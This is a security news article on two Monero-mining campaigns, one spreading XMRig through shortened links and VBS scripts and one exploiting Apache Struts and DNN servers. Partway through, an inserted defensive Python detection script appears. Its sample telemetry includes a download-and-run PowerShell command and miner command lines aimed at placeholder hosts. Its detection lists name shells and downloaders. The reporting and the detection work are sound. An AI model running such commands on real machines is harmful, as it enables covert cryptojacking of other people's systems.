More Than 15 Million Users Infected with Monero Mining Malware

A large-scale malicious campaign has surreptitiously installed “mining” software for the Monero cryptocurrency on at least 15 million—and as many as 30 million—systems around the world.

The campaign has been active for the past four months, according to researchers from security firm Palo Alto Networks. They estimated the number of victims by analyzing statistics from Bitly, a URL shortening service abused by the attackers.

“It’s important to note that the actual number of victims is likely much higher because less than half of the samples we identified in this campaign leverage bitly,” the researchers said in a blog post. “If we postulate that the bitly telemetry is typical for this operation, we can extrapolate to speculate that as many as 30 million people have been affected by this operation.”

Another URL shortening service frequently abused in this campaign was AdFly, a service that allows users to create shortened URLs and get paid small commissions when other users visit those links and are shown ads during the redirects.

The attacks trick users into clicking on the rogue links, which then redirect them to malicious executable files that use VBS scripts to install XMRig, an open source Monero mining application. The Palo Alto researchers have observed more than 250 unique malicious samples associated with this campaign, many of which were hosted on the 4sync online cloud storage provider.

The victims are distributed globally, but the highest number of impacted users appears to be in southeast Asia, northern Africa and South America.

Compared to other cryptocurrencies, Monero can be mined on commodity hardware such as home PCs. This has created an incentive for attackers to hijack other people’s computing resources for this purpose, especially since Monero also can be mined in the browser through code launched from malicious or compromised websites.

“Monero mining campaigns are certainly not a new development, as there have been various reported instances recently,” the Palo Alto researchers said. “However, it is less common to observe such a large-scale campaign go relatively unnoticed for such a long period of time. By targeting random end-users (sic) via malicious advertisements, using seemingly innocuous names for the malware files, and using both built-in Windows utilities and scripting files, the attackers are able to gain a foothold on victim systems at large scale.”

Such campaigns can also affect companies because cryptocurrency mining has a significant impact on computers’ performance. This means infected business computers might not be able to run applications efficiently, resulting in lower productivity for employees.

Different Mining Campaign Hits Web Servers

Security researchers from Trend Micro have spotted a different malicious Monero mining operation that hijacks business web servers by exploiting vulnerabilities in Apache Struts and the DotNetNuke content management system.

The attacks observed by Trend Micro use exploits for CVE-2017-5638, the Apache Struts vulnerability that led to the Equifax breach, and CVE-2017-9822, a vulnerability patched in July in DNN and EVOQ platforms. DNN, previously known as DotNetNuke, is a CMS written in Microsoft .NET that’s popular with companies.

“We believe that this is the work of a single threat actor, as the sites all point to a single malicious domain to download Monero miners, which also all point to a single Monero address,” the researchers said in a blog post. “It has already received 30 XMR [Monero], equating to approximately 12,000 US dollars based on mid-January 2018 exchange rates.”

Servers are an attractive target for cryptocurrency miners because they have more computing power than laptop and desktop computers. They also run various services and applications that can be directly accessible from the internet and vulnerable to attacks.

For example, Apache Struts is a popular framework for building Java-based web applications. It has been targeted frequently by hackers over the past couple of years and has had several critical vulnerabilities during that time frame.

“System administrators have to adjust to the reality that Struts attacks are now a regular part of the threat landscape,” the Trend Micro researchers said.
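Both campaigns described above leave the same kind of trace in endpoint telemetry: a Windows script host (the VBS-based chain that installs XMRig) or a web-server process (Struts in a Java process, DNN under IIS) spawning something it normally never would, and a child process whose command line carries a mining-pool URL. The following script is an added example, not code from the article or from the Palo Alto Networks or Trend Micro research, showing how a defender could run such heuristics over process-creation events. The pipe-delimited log format, the constructed sample events, the lists of script hosts and web-server parents, and the choice of indicators (the `stratum+tcp://` pool scheme and XMRig's `--donate-level`, `-o`/`--url` and `-u`/`--user` flags) are assumptions of this example.

```python
"""Heuristic cryptominer-deployment detection over process-creation telemetry.

Added example (not the article's or the vendors' code). The events below are
constructed to resemble Sysmon/EDR process-creation records in an assumed
format:  timestamp|host|parent_image_name|image_path|command_line
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Parents that should not be launching miners (assumed list; the article
# names VBS scripts and "built-in Windows utilities").
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe"}
# Parents that host Struts (Java) or DNN (IIS worker process) applications (assumed list).
WEB_SERVER_PROCESSES = {"java.exe", "java", "w3wp.exe"}
# Children a web-server process should never spawn (assumed list).
SHELLS_AND_DOWNLOADERS = {"cmd.exe", "powershell.exe", "sh", "bash", "curl", "curl.exe", "wget"}

# Strong miner indicators: pool URL scheme, XMRig-specific flag, XMRig binary name.
MINER_PATTERNS = [
    re.compile(r"stratum\+(?:tcp|ssl)://", re.I),
    re.compile(r"--donate-level", re.I),
    re.compile(r"\bxmrig\b", re.I),
]
# Weaker indicator: pool flag and wallet/user flag appearing together.
POOL_FLAG = re.compile(r"(?:^|\s)(?:-o|--url)[= ]", re.I)
USER_FLAG = re.compile(r"(?:^|\s)(?:-u|--user)[= ]", re.I)


def looks_like_miner(command_line: str) -> bool:
    """True when the command line carries typical XMRig/stratum miner arguments."""
    if any(p.search(command_line) for p in MINER_PATTERNS):
        return True
    return bool(POOL_FLAG.search(command_line) and USER_FLAG.search(command_line))


@dataclass
class Event:
    ts: str
    host: str
    parent: str        # parent image name, lower-cased
    image: str         # full path of the new process
    command_line: str

    @property
    def image_name(self) -> str:
        return self.image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_event(line: str) -> Event:
    ts, host, parent, image, cmd = line.split("|", 4)
    return Event(ts, host, parent.strip().lower(), image, cmd)


def evaluate(event: Event) -> list[tuple[str, str]]:
    """Return (severity, rule_name) findings for a single event."""
    findings: list[tuple[str, str]] = []
    miner = looks_like_miner(event.command_line)
    if miner and event.parent in SCRIPT_HOSTS:
        findings.append(("high", "script_host_launched_miner"))   # the VBS -> XMRig chain
    elif miner:
        findings.append(("medium", "miner_command_line"))
    if event.parent in WEB_SERVER_PROCESSES and event.image_name in SHELLS_AND_DOWNLOADERS:
        findings.append(("high", "web_server_spawned_shell"))     # post-exploitation on Struts/DNN hosts
    return findings


def detect(lines: list[str]) -> list[dict]:
    """Run every rule over every event and return the alerts in log order."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        for severity, rule in evaluate(ev):
            alerts.append({"ts": ev.ts, "host": ev.host, "severity": severity,
                           "rule": rule, "image": ev.image_name})
    return alerts


# Constructed sample telemetry: a workstation hit by the script-based chain and a
# web server whose Java process spawns a shell that fetches and runs a miner.
SAMPLE_EVENTS = [
    r"2018-01-24T10:01:05Z|WS-017|explorer.exe|C:\Windows\System32\wscript.exe|wscript.exe C:\Users\u\AppData\Local\Temp\setup.vbs",
    r"2018-01-24T10:01:07Z|WS-017|wscript.exe|C:\Users\u\AppData\Roaming\svchost32.exe|svchost32.exe -o stratum+tcp://pool.example.invalid:3333 -u 4EXAMPLEWALLET -p x --donate-level=1 -k",
    r"2018-01-24T10:02:11Z|WS-017|explorer.exe|C:\Program Files\Mozilla Firefox\firefox.exe|firefox.exe",
    r"2018-01-24T11:15:42Z|WEB-03|java.exe|C:\Windows\System32\cmd.exe|cmd.exe /c powershell.exe -c Invoke-WebRequest http://miner-host.example.invalid/x.exe -OutFile C:\tmp\x.exe",
    r"2018-01-24T11:15:48Z|WEB-03|cmd.exe|C:\tmp\x.exe|x.exe -o stratum+tcp://pool.example.invalid:5555 -u 4EXAMPLEWALLET --donate-level=0",
    r"2018-01-24T11:20:00Z|WEB-03|w3wp.exe|C:\Windows\System32\conhost.exe|conhost.exe 0x4",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert['ts']} {alert['host']:7} {alert['severity']:6} {alert['rule']:28} {alert['image']}")
```

The web-server rule fires on the parent/child relationship alone, so it catches the initial shell even before any miner arguments are visible; the miner rule is then a second, independent signal on the same host, which is what makes the pairing useful for triage. On real telemetry the parent and child lists need tuning per environment (a build server legitimately running `java` that calls `sh` will be noisy), and the pool-URL pattern should be supplemented with network indicators, since a miner can be renamed but still has to reach a pool.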

Lucian Constantin

Lucian has been covering computer security and the hacker culture for almost a decade, his work appearing in many technology publications including PCWorld, Computerworld, Network World, CIO, CSO, Forbes and The Inquirer. He has a bachelor's degree in political science, but has been passionate about computers and cybersecurity from an early age. Before he chose a career in journalism, Lucian worked as a system and network administrator. He enjoys attending security conferences and delving into interesting research papers. You can reach him at [email protected] or @lconstantin on Twitter. For encrypted email, his PGP key's fingerprint is: 7A66 4901 5CDA 844E 8C6D 04D5 2BB4 6332 FC52 6D42
